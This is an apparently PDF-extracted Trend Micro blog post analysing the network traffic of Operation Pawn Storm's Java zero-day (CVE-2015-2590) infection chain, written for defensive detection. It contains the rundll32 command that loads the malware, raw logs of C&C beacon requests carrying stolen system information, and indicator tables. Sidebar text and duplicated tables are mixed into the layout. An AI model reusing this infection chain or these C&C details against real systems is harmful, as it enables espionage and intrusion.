**Go to…** **▼** **[Home » Exploits » An In-Depth Look at How Pawn Storm’s Java Zero-Day Was Used](http://blog.trendmicro.com/trendlabs-security-intelligence/)** **Featured Stories** ## An In-Depth Look at How Pawn Storm’s Java Zero-Day Was Pawn Storm Targets MH17 Investigation Team Used FBI, Security Vendors Partner for DRIDEX **Takedown** **[Posted on: July 14, 2015](http://blog.trendmicro.com/trendlabs-security-intelligence/2015/07/)** **at 9:29** **[Posted in: Exploits,](http://blog.trendmicro.com/trendlabs-security-intelligence/category/exploits/)** **[Malware,](http://blog.trendmicro.com/trendlabs-security-intelligence/category/malware/)** **[Targeted Attacks](http://blog.trendmicro.com/trendlabs-security-intelligence/category/targeted_attacks/)** **Author: Trend** **pm** **Micro** **[Japanese Cybercriminals New Addition To](http://blog.trendmicro.com/trendlabs-security-intelligence/japanese-cybercriminals-new-addition-to-underground-arena/)** **Underground Arena** **52** **166** **48** **Follow the Data: Dissecting Data Breaches and** **Debunking the Myths** **Operation Pawn Storm is a campaign known to target military, embassy, and defense contractor** **Nigerian Cuckoo Miner Campaign Takes Over** **personnel from the United States and its allies. The attackers behind Operation Pawn Storm have been** **Legitimate Inboxes, Targets Banks** **active since at least 2007 and they continue to launch new campaigns.** **Over the past year or so, we have seen numerous techniques and tactics employed by this campaign,** **Recent Posts** **[such as the use of an iOS espionage app, and the inclusion of new targets like the White House.](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/)** **Through our on-going investigation and monitoring of this targeted attack campaign, we found** **2016 Predictions: The Fine Line Between Business** **and Personal** **suspicious URLs that hosted a newly discovered zero-day exploit in Java now identified by Oracle as** **[CVE-2015-2590. This is the first time in nearly two years that a new Java zero-day vulnerability](https://blogs.oracle.com/security/entry/july_2015_critical_patch_update)** **was** **[Pornographic-themed Malware Hits Android Users](http://blog.trendmicro.com/trendlabs-security-intelligence/pornographic-themed-malware-hits-android-users-in-china-taiwan-japan/)** **reported.** **in China, Taiwan, Japan** **_The report below outlines the traffic observed as part of the attack, not the exploit itself. Our blog entry_** **[Pawn Storm Targets MH17 Investigation Team](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-targets-mh17-investigation-team/)** **_[on how the exploit itself works can be found here. This blog entry is intended to help readers identify](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-trend-micro-discovers-new-java-zero-day-exploit/)_** **_traffic in their network that would indicate if such an exposure had occurred. We strongly recommend_** **[New Headaches: How The Pawn Storm Zero-Day](http://blog.trendmicro.com/trendlabs-security-intelligence/new-headaches-how-the-pawn-storm-zero-day-evaded-javas-click-to-play-protection/)** **Evaded Java’s Click-to-Play Protection** **_[that all readers roll out the Oracle patch as soon as possible](https://blogs.oracle.com/security/entry/july_2015_critical_patch_update)_** **[Latest Flash Exploit Used in Pawn Storm](http://blog.trendmicro.com/trendlabs-security-intelligence/latest-flash-exploit-used-in-pawn-storm-circumvents-mitigation-techniques/)** **_Infection sequence_** **Circumvents Mitigation Techniques** **Trend Micro has observed that an entity belonging to the target profile received an email that contains** **the following URL:** #### Threat Intelligence: The Deep Web **hxxp://ausameetings[.]com/url?={BLOCKED}/2015annualmeeting/** **It is worth noting that the spearphishing domain used is ausameetings[.]com, a play on the valid** **domain “ausameetings.org,” which is a site for AUSA’s (Association of the United States Army) annual** **exposition, commonly held in mid-October. The domain was only registered last July 8, which implies a** **one-time use for a specific set of targets.** **When assessing this URL, it was determined that the most probable infection sequence is:** **The latest research and information on** **the deep web and the cybercriminal** **underground.** **[Learn more about the Deep Web](http://www.trendmicro.com/vinfo/us/security/threat-intelligence-center/deep-web/)** #### Popular Posts **[New Adobe Flash Zero-Day Used in Pawn Storm](http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-flash-zero-day-used-in-pawn-storm-campaign/)** **Campaign Targeting Foreign Affairs Ministries** **[Latest Flash Exploit Used in Pawn Storm](http://blog.trendmicro.com/trendlabs-security-intelligence/latest-flash-exploit-used-in-pawn-storm-circumvents-mitigation-techniques/)** **Circumvents Mitigation Techniques** **[New Headaches: How The Pawn Storm Zero-Day](http://blog.trendmicro.com/trendlabs-security-intelligence/new-headaches-how-the-pawn-storm-zero-day-evaded-javas-click-to-play-protection/)** **Evaded Java’s Click-to-Play Protection** **[Pawn Storm Targets MH17 Investigation Team](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-targets-mh17-investigation-team/)** **_Figure 1. Infection chain_** **Cybercriminals Improve Android Malware Stealth** **Routines with OBAD** **Like all multi-stage infections, a successful execution of the previous stage is required before moving to** **the next stage down. In Stage 1, the sequence is initiated by clicking on the URL embedded within the** #### Latest Tweets **victim’s spearphishing email.** **Once the Java exploit of Stage 1 is successful, it downloads the PE file (Stage 2). Once the PE file is** **Fake porn sites lead to #mobile #malware** **downloaded and executed it drops and runs the DLL file (Stage 3) which is the final component to infect** **[bit.ly/1P1oGlw](https://t.co/V6BUYy8T7B)** **[about 4 hours ago](http://twitter.com/TrendLabs/status/660244795080712192)** **the machine with SEDNIT.** **#IoT's growing popularity raises safety** **The information that we have on each of these steps is as follows.** **concerns due to lack of regulation:** ----- **‘Tis the season to be scary. We dressed up** **common #threats as #Halloween** **[bit.ly/20fiz2c #infosec](https://t.co/70G4Kh4Dtv)** **Email Subscription** **Your email here** # bb |Stage|Type|SHA1|File Name|File Size|Trend Micro Detection|Col7| |---|---|---|---|---|---|---| |Stage 1|Java Exploit|95dc765700f5af406883 d07f165011d2ff8dd0fb|Spearphishing URL matching hxxp://ausameetings[.]com/url? =[a-zA-Z0-9] {7}/2015annualmeeting/||JAVA_DLOADR.E|FD ab| |Stage 2|PE|b4a515ef9de037f18d96 b9b0e48271180f5725b7|Drops as cormac.mcr End resulting file on host system as vhgg5hkvn25.exe|1,619,968 bytes|TROJ_DROPPR.|CXC‘T co m| |Stage 3|DLL|21835aafe6d46840bb69 7e8b0d4aac06dec44f5b|api-ms-win-downlevel-profile- l1-1-0.dll|40,960 bytes|TSPY_SEDNIT.|C| |Stage 1 – the Java exploit The first stage of the infection sequence comes through a targeted, spearphishing attempt against the victim, which is the observed method for Operation Pawn Storm attacks. The initial spearphishing URL is constructed similar to: hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/ The web pages on this domain that were found to drop the Java zero-day exploit include: 1_2015annualmeeting index.htm (19,225 bytes) – detected as HTML_JNLPER.HAQ||||||| |Result|Protocol|Host|URL|Size|Content-Type| |---|---|---|---|---|---| |200|HTTP|ausameetings[.]com|/url?={BLOCKED}/2015annualmeeting/|19,225|text/html; charset=utf-8| |200|HTTP|ausameetings[.]com|/VFlmsRH/7311/4388/558923/? p2=KlW2HlMf&c= BMjNiBV&recr=Wr1mI7&p3=364397021& as=SAUmj&c=GY9oCdQ&|22|text/html; charset=utf-8| |200|HTTP|ausameetings[.]com|/url/544036/|4,077|text/html; charset=utf-8| |200|HTTP|ausameetings[.]com|/url/544036/line.jpg|22,500|text/html; charset=utf-8| |200|HTTP|ausameetings[.]com|/url/544036/right.jpg|97,247|text/html; charset=utf-8| |200|HTTP|ausameetings[.]com|/url/544036/init.jnlp|562|application/x- java-jnlp-file| |200|HTTP|ausameetings[.]com|/url/544036/|4,077|text/html; charset=utf-8| |200|HTTP|ausameetings[.]com|/url/544036/jndi.properties|125|text/html; charset=utf-8| |404|HTTP|ausameetings[.]com|/url/544036/Go.class|0|text/html; charset=utf-8| **Stage** **Java** **95dc765700f5af406883** **Spearphishing URL matching** **JAVA_DLOADR.EFD** **1** **Exploit** **d07f165011d2ff8dd0fb** **hxxp://ausameetings[.]com/url?** **=[a-zA-Z0-9]** **{7}/2015annualmeeting/** **[about 11 hours ago](http://twitter.com/TrendLabs/status/660139101165875200)** **Stage** **PE** **b4a515ef9de037f18d96** **Drops as cormac.mcr** **1,619,968** **TROJ_DROPPR.CXC‘Tis the season to be scary. We dressed up** **common #threats as #Halloween** **2** **b9b0e48271180f5725b7** **bytes** **[monsters! bit.ly/20fiz2c #infosec](https://t.co/70G4Kh4Dtv)** **End resulting file on host** **system as vhgg5hkvn25.exe** **Stage** **DLL** **21835aafe6d46840bb69** **api-ms-win-downlevel-profile-** **40,960** **[TSPY_SEDNIT.C](http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/TSPY_SEDNIT.C)** **3** **7e8b0d4aac06dec44f5b** **l1-1-0.dll** **bytes** **_Stage 1 – the Java exploit_** **The first stage of the infection sequence comes through a targeted, spearphishing attempt against the** **[victim, which is the observed method for Operation Pawn Storm attacks.](http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-operation-pawn-storm.pdf)** **The initial spearphishing URL is constructed similar to:** **hxxp://ausameetings[.]com/url?=[a-zA-Z0-9]{7}/2015annualmeeting/** **The web pages on this domain that were found to drop the Java zero-day exploit include:** **[about 12 hours ago](http://twitter.com/TrendLabs/status/660131551590621184)** **1_2015annualmeeting index.htm (19,225 bytes) – detected as HTML_JNLPER.HAQ** **3_544306 index.htm (4,077 bytes) – detected as HTML_JNLPER.HAQ** #### Stay Updated **The network traffic observed for the infection sequence of this stage is:** **1. Send the initial POST as per the spearphishing email to ausameetings[.]com, which includes the** **Email Subscription** **_2015annualmeeting URI path._** **Your email here** **2. Send an encoded POST call, which, when decoded, is the variable to construct the subsequently** **used URI path. This is particularly interesting as it appears that each URI path on the malicious** **server is customized by the victim’s infection, rather than static on the web server.** **3. The victim machine then does a variety of GET calls to pull down JPG, JNLP, and Java class files.** **4. If the Java class files cannot be found on the primarily domain ( ausameetings[.]com), it appears to** **instead attempt to get these files from a hardcoded IP (87[.]236[.]215[.]132).** **5. Once the class files are downloaded, the victim machine then does a GET call to fetch the file** **_cormac.mcr. This file is the PE file for Stage 2._** **For completeness, the specific traffic calls observed relating to Stage 1 include the following:** **Result** **Protocol** **Host** **URL** **Size** **Content-Type** **200** **HTTP** **ausameetings[.]com** **/url?={BLOCKED}/2015annualmeeting/** **19,225** **text/html;** **charset=utf-8** **200** **HTTP** **ausameetings[.]com** **/VFlmsRH/7311/4388/558923/?** **22** **text/html;** **p2=KlW2HlMf&c=** **charset=utf-8** **BMjNiBV&recr=Wr1mI7&p3=364397021&** **as=SAUmj&c=GY9oCdQ&** **200** **HTTP** **ausameetings[.]com** **/url/544036/** **4,077** **text/html;** **charset=utf-8** **200** **HTTP** **ausameetings[.]com** **/url/544036/line.jpg** **22,500** **text/html;** **charset=utf-8** **200** **HTTP** **ausameetings[.]com** **/url/544036/right.jpg** **97,247** **text/html;** **charset=utf-8** **200** **HTTP** **ausameetings[.]com** **/url/544036/init.jnlp** **562** **application/x-** **java-jnlp-file** **200** **HTTP** **ausameetings[.]com** **/url/544036/** **4,077** **text/html;** **charset=utf-8** **200** **HTTP** **ausameetings[.]com** **/url/544036/jndi.properties** **125** **text/html;** **charset=utf-8** **404** **HTTP** **ausameetings[.]com** **/url/544036/Go.class** **0** **text/html;** **charset=utf-8** ----- |Col1|Col2|Col3|Col4|Col5|charset=utf-8| |---|---|---|---|---|---| |404|HTTP|87[.]236[.]215[.]132|/crossdomain.xml|0|text/html; charset=utf-8| |200|HTTP|87[.]236[.]215[.]132|/2/App.class|7,552|text/html; charset=utf-8| |200|HTTP|87[.]236[.]215[.]132|/2/Help.class|5,667|text/html; charset=utf-8| |200|HTTP|87[.]236[.]215[.]132|/2/PhantomSuper.class|763|text/html; charset=utf-8| |200|HTTP|87[.]236[.]215[.]132|/2/ArrayReplace.class|729|text/html; charset=utf-8| |200|HTTP|87[.]236[.]215[.]132|/2/App$PassHandleController.class|980|text/html; charset=utf-8| |200|HTTP|87[.]236[.]215[.]132|/2/Converter.class|2,820|text/html; charset=utf-8| |200|HTTP|87[.]236[.]215[.]132|/2/MyByteArrayInputStream.class|1,282|text/html; charset=utf-8| |404|HTTP|87[.]236[.]215[.]132|/2/pkg/None2.class|0|text/html; charset=utf-8| |404|HTTP|87[.]236[.]215[.]132|/2/pkg/None.class|0|text/html; charset=utf-8| |200|HTTP|ausameetings[.]com|/url/544036/cormac.mcr|1,619,968|application/octet- stream| **200** **HTTP** **87[.]236[.]215[.]132** **/2/Go.class** **1,373** **text/html;** **charset=utf-8** **404** **HTTP** **87[.]236[.]215[.]132** **/crossdomain.xml** **0** **text/html;** **charset=utf-8** **200** **HTTP** **87[.]236[.]215[.]132** **/2/App.class** **7,552** **text/html;** **charset=utf-8** **200** **HTTP** **87[.]236[.]215[.]132** **/2/Help.class** **5,667** **text/html;** **charset=utf-8** **200** **HTTP** **87[.]236[.]215[.]132** **/2/PhantomSuper.class** **763** **text/html;** **charset=utf-8** **200** **HTTP** **87[.]236[.]215[.]132** **/2/ArrayReplace.class** **729** **text/html;** **charset=utf-8** **200** **HTTP** **87[.]236[.]215[.]132** **/2/App$PassHandleController.class** **980** **text/html;** **charset=utf-8** **200** **HTTP** **87[.]236[.]215[.]132** **/2/Converter.class** **2,820** **text/html;** **charset=utf-8** **200** **HTTP** **87[.]236[.]215[.]132** **/2/MyByteArrayInputStream.class** **1,282** **text/html;** **charset=utf-8** **404** **HTTP** **87[.]236[.]215[.]132** **/2/pkg/None2.class** **0** **text/html;** **charset=utf-8** **404** **HTTP** **87[.]236[.]215[.]132** **/2/pkg/None.class** **0** **text/html;** **charset=utf-8** **200** **HTTP** **ausameetings[.]com** **/url/544036/cormac.mcr** **1,619,968** **application/octet-** **stream** **Trend Micro detects these Java class files as JAVA_DLOADR.EFD:** **App.class (7,552 bytes)** **Go.class (1,373 bytes)** **Help.class (5,667 bytes)** **The second and third traffic calls in the traffic pattern are particularly interesting to note.** **_Figure 2. Traffic patterns (click the image to enlarge)_** **One can observe that the second call sends a POST to ausumeetings[.]com, and is returned with a text** **_responsecfa that then subsequently is used as the URI path for the subsequent HTTP requests._** **_Stage 2 – The PE file_** **Stage 2 involves downloading a PE file. Trend Micro detects this file as TROJ_DROPPR.CXC. The** **primary purpose of this PE is to drop and load the DLL executable. It is downloaded as Cormac.mcr,** **but once extracted, the file name is converted into a randomized file name. It is installed into** ----- |1|POST /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: www.google.com Content-Length: 0 Note: Assumed to be a local connectivity test traffic call.| |---|---| |2|POST /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 192[.]111[.]146[.]185 Content-Length: 830| |3|POST /hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk= HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: www.google.com Content-Length: 0 Note: Assumed to be a local connectivity test traffic call.| |4|POST /C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs= HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 192[.]111[.]146[.]185 Content-Length: 0| |5|POST /k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM= HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 192[.]111[.]146[.]185 Content-Length: 26| **_Figure 3. Observed processes (click the image to enlarge)_** **Once the malware is executed, it will drop the Stage 3 DLL file with filename** **_api-ms-win-downlevel-_** **_profile-l1-1-0.dll in the %TEMP% directory. To load the malware, it executes rundll32.exe using the_** **following command:** **rundll32.exe “%temp%/api-ms-win-downlevel-profile-l1-1-0.dll”,init** **_Stage 3 – The DLL file_** **This third stage involves a DLL file, which we detect as TSPY_SEDNIT.C. When the PE file triggers the** **DLL (in this instance, %windir%\system32\RunDll32.exe Command:** **“%windir%\system32\RunDll32.exe ” “C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ap i-ms-win-** **downlevel-profile-l1-1-0.dll”,init), the following traffic was observed.** **1** **POST /ESL/YxF8bM/f/MFS.pdf/?duJ=OJYKZRlzy1tddcpaKjU= HTTP/1.1** **Content-Type: application/x-www-form-urlencoded** **Host: www.google.com** **Content-Length: 0** **_Note: Assumed to be a local connectivity test traffic call._** **2** **POST /RGLw/ofEK/5w2a.htm/?6=9SpyZtTPs1iQybJZ54k= HTTP/1.1** **Content-Type: application/x-www-form-urlencoded** **Host: 192[.]111[.]146[.]185** **Content-Length: 830** **3** **POST /hP/Bo/S/2z.htm/?WDC=TJrXZm1/FlgpeRdZXjk= HTTP/1.1** **Content-Type: application/x-www-form-urlencoded** **Host: www.google.com** **Content-Length: 0** **_Note: Assumed to be a local connectivity test traffic call._** **4** **POST /C9zl/LJ9.zip/?hP=mLgAZ7ldwVn9W8BYihs= HTTP/1.1** **Content-Type: application/x-www-form-urlencoded** **Host: 192[.]111[.]146[.]185** **Content-Length: 0** **5** **POST /k9/eR3/a/UE/eR.pdf/?bKC=xCCmnuXFZ6Chw2ah1oM= HTTP/1.1** **Content-Type: application/x-www-form-urlencoded** **Host: 192[.]111[.]146[.]185** **Content-Length: 26** **It bears stressing that we do not encourage using the data presented above as IOCs for your own** **analysis. The network traffic generated by this stage was a challenge to assess as it appears to have** **polymorphic capabilities in the creation of URI paths utilized to pull down files. After assessing the** **samples multiple times, each network traffic infection sequence appeared to be different, no matter** **what sequence of testing was performed (e.g., same machine, different machines, different geographic** **IP space globally, etc.).** **After detailed network forensics of the traffic, it was determined that no single stable URL path or URI** **query component (URI path component, file name, or URI query parameter) showed a consistent** **pattern (either same entry nor regex definable pattern), and further reverse engineering was required to** **determine the methods used to achieve this.** **As a result of this additional analysis, it was determined that the URI path is a random generated string** **with the following pattern:** **^/([a-zA-Z0-9]{1,6}/){1,5}[a-zA-Z0-9]{1,7}\.(xml|pdf|htm|zip)/\?[a-zA-Z0-9]{1,3}=** ----- |Stage|Type|Indicator|Precision| |---|---|---|---| |Infection Sequence – Stage 1|Domain|ausameetings[.]com|High| |Infection Sequence – Stage 1|Domain_IP|95[.]215[.]45[.]189|Low| **_Figure 4. Regex expression_** **Included in the POST request is a data encoded with Base64 and XOR encryption. The encoded data** **contains the following system information of the infected machine:** **OS Version** **List of running processes** **Hard Disk Drive Information** **Volume Serial Number** **TSPY_SEDNIT.C connects to three C&C servers:** **192[.]111[.]146[.]185 (direct to IP call)** **www[.]acledit[.]com** **www[.]biocpl[.]org** **After sending the encrypted data it will wait for a reply which is encrypted by the same algorithm above.** **_Phase 2 of the attack: the keystroke logger_** **Based on our investigation of Operation Pawn Storm, we know that the infection happens in two** **stages:** **In phase 1, opening the email attachment or clicking on the malicious URI initiates the download of** **the first level dropper, which installs the downloader component (.DLL file).** **In phase 2, the downloader component communicates with a C&C server and downloads other** **components, and at the end of the chain a keylogger is installer. The keylogger sends data back to** **the C&C server.** **As of writing, we have not succeeded in triggering Phase 2, which will download a fourth stage** **malware from the C&C servers. This fourth stage malware is expected to be an encrypted executable** **file.** **_Victims of the Attack_** **A number of victims were identified during the course of our investigation. The targets are in the United** **States or Canada, and those we were able to identify via IP are big defense contractors, as typical for** **Operation PawnStorm.** **_Countermeasures_** **Trend Micro is already able to protect users against this threat without any necessary updates. The** **[existing Sandbox with Script Analyzer engine, which is part of Trend Micro™ Deep Discovery, can be](http://www.trendmicro.com/us/enterprise/security-risk-management/deep-discovery/http:/www.trendmicro.com/us/enterprise/security-risk-management/deep-discovery/)** **used to detect this threat by its behavior. The Browser Exploit Prevention feature in the Endpoint** **[Security in Trend Micro™ Smart Protection Suite detects the exploit once the user accesses the URL](http://www.trendmicro.com/us/business/complete-user-protection/)** **that hosted it. Our Browser Exploit Prevention detects user systems against exploits targeting browsers** **or related plugins.** **[Vulnerability protection in Trend Micro Deep Security protects user systems from threats that may](http://www.trendmicro.com/us/business/cloud-data/index.html)** **leverage this vulnerability with the following DPI rule:** **1006857 – Oracle Java SE Remote Code Execution Vulnerability** **Oracle has also provided** **[a security patch for the related vulnerability.](http://blog.trendmicro.com/trendlabs-security-intelligence/oracle-patches-java-zero-day-used-in-operation-pawn-storm/)** **_Indicators of Compromise_** **The following table summarizes the identified stable IOCs that can be used to search for this attack.** **The “Precision” column indicates how close to the direct parameter the indicator is, inversely indicating** **likelihood of collateral false positives.** **Stage** **Type** **Indicator** **Precision** **Infection Sequence – Stage** **Domain** **ausameetings[.]com** **High** **1** **Infection Sequence – Stage** **Domain_IP** **95[.]215[.]45[.]189** **Low** **1** **Infection Sequence – Stage** **IP** **87[.]236[.]215[.]132** **High** ----- |Infection Sequence – Stage 1|URIPath_FileName|ArrayReplace.class|Medium| |---|---|---|---| |Infection Sequence – Stage 1|URIPath_FileName|App$PassHandleController.class|Medium| |Infection Sequence – Stage 1|URIPath_FileName|Converter.class|Medium| |Infection Sequence – Stage 1|URIPath_FileName|MyByteArrayInputStream.class|Medium| |Infection Sequence – Stage 1|URIPath_FileName|None2.class|Medium| |Infection Sequence – Stage 1|URIPath_FileName|None.class|Medium| |Infection Sequence – Stage 1->2|URIPath_FileName|cormac.mcr|High| |Infection Sequence – Stage 3||192[.]111[.]146[.]185|High| |Infection Sequence – Stage 3|IP_DirectCall|37[.]187[.]116[.]240|High| |Infection Sequence – Stage 3|Domain|www[.]acledit[.]com|High| |Infection Sequence – Stage 3|Domain|www[.]biocpl[.]org|High| **Infection Sequence – Stage** **URIPath_FileName** **App$PassHandleController.class** **Medium** **1** **Infection Sequence – Stage** **URIPath_FileName** **Converter.class** **Medium** **1** **Infection Sequence – Stage** **URIPath_FileName** **MyByteArrayInputStream.class** **Medium** **1** **Infection Sequence – Stage** **URIPath_FileName** **None2.class** **Medium** **1** **Infection Sequence – Stage** **URIPath_FileName** **None.class** **Medium** **1** **Infection Sequence – Stage** **URIPath_FileName** **cormac.mcr** **High** **1->2** **Infection Sequence – Stage** **192[.]111[.]146[.]185** **High** **3** **Infection Sequence – Stage** **IP_DirectCall** **37[.]187[.]116[.]240** **High** **3** **Infection Sequence – Stage** **Domain** **www[.]acledit[.]com** **High** **3** **Infection Sequence – Stage** **Domain** **www[.]biocpl[.]org** **High** **3** **Other posts related to Operation Pawn Storm can be found here:** **[Pawn Storm Update: Trend Micro Discovers New Java Zero-Day Exploit](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-trend-micro-discovers-new-java-zero-day-exploit/)** **[Pawn Storm Espionage Attacks Use Decoys, Deliver SEDNIT](http://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/pawn-storm-espionage-attacks-use-decoys-deliver-sednit)** **[Operation Pawn Storm: Putting Outlook Web Access Users at Risk](http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-putting-outlook-web-access-users-at-risk/)** **[Pawn Storm Update: iOS Espionage App Found](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-update-ios-espionage-app-found/)** **[Operation Pawn Storm Ramps Up its Activities; Targets NATO, White House](http://blog.trendmicro.com/trendlabs-security-intelligence/operation-pawn-storm-ramps-up-its-activities-targets-nato-white-house/)** **[Pawn Storm: First Java Zero-Day Attack in Two Years Targets NATO & US Defense Organizations](http://blog.trendmicro.com/pawn-storm-first-java-zero-day-attack-in-two-years-targets-nato-us-defense-organizations/)** **_Updated on July 15, 2015, 9:57AM PDT (UTC-7) to include revised detection name for DLL file and_** **_clarifications to the infection flow._** **_Updated on July 15, 2015, 1:15PM PDT (UTC-7) to include more details about the infection flow._** **_Updated on July 16, 2015 1:36PM PDT (UTC-7) to include screenshots of running processes._** ### Related Posts: **[Analyzing the Pawn Storm Java Zero-Day – Old Techniques Reused](http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-the-pawn-storm-java-zero-day-old-techniques-reused/)** **[Pawn Storm C&C Redirects to Trend Micro IP Address](http://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-cc-redirects-to-trend-micro-ip-address/)** **[Oracle Patches Java Zero-Day Used in Operation Pawn Storm](http://blog.trendmicro.com/trendlabs-security-intelligence/oracle-patches-java-zero-day-used-in-operation-pawn-storm/)** **[New Headaches: How The Pawn Storm Zero-Day Evaded Java’s Click-to-Play Protection](http://blog.trendmicro.com/trendlabs-security-intelligence/new-headaches-how-the-pawn-storm-zero-day-evaded-javas-click-to-play-protection/)** **Tags:** **[APT28](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/apt28/)** **[CVE-2015-2590](http://blog.trendmicro.com/trendlabs-security-intelligence/tag/cve-2015-2590/)** **java zero-** ----- **[HOME AND HOME OFFICE](http://www.trendmicro.com/us/home/index.html)** **|** **[FOR BUSINESS](http://www.trendmicro.com/us/business/index.html)** **|** **[SECURITY INTELLIGENCE](http://www.trendmicro.com/us/security-intelligence/index.html)** **|** **[ABOUT TREND MICRO](http://www.trendmicro.com/us/about-us/index.html)** **[Asia Pacific Region (APAC): Australia / New Zealand, 中国, ⽇本, 대한민국](http://www.trendmicro.com.au/au/home/index.html)** **[, 台灣](http://tw.trendmicro.com/tw/home/index.html)** **[Latin America Region (LAR): Brasil, México](http://br.trendmicro.com/br/home/index.html)** **[North America Region (NABU): United States, Canada](http://www.trendmicro.com/us/index.html)** **[Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland](http://www.trendmicro.fr/)** **[Privacy Statement](http://www.trendmicro.com/us/about-us/legal-policies/privacy-statement/index.html)** **[Legal Policies](http://www.trendmicro.com/us/about-us/legal-policies/index.html)** **Copyright © 2015 Trend Micro Incorporated. All rights reserved.** -----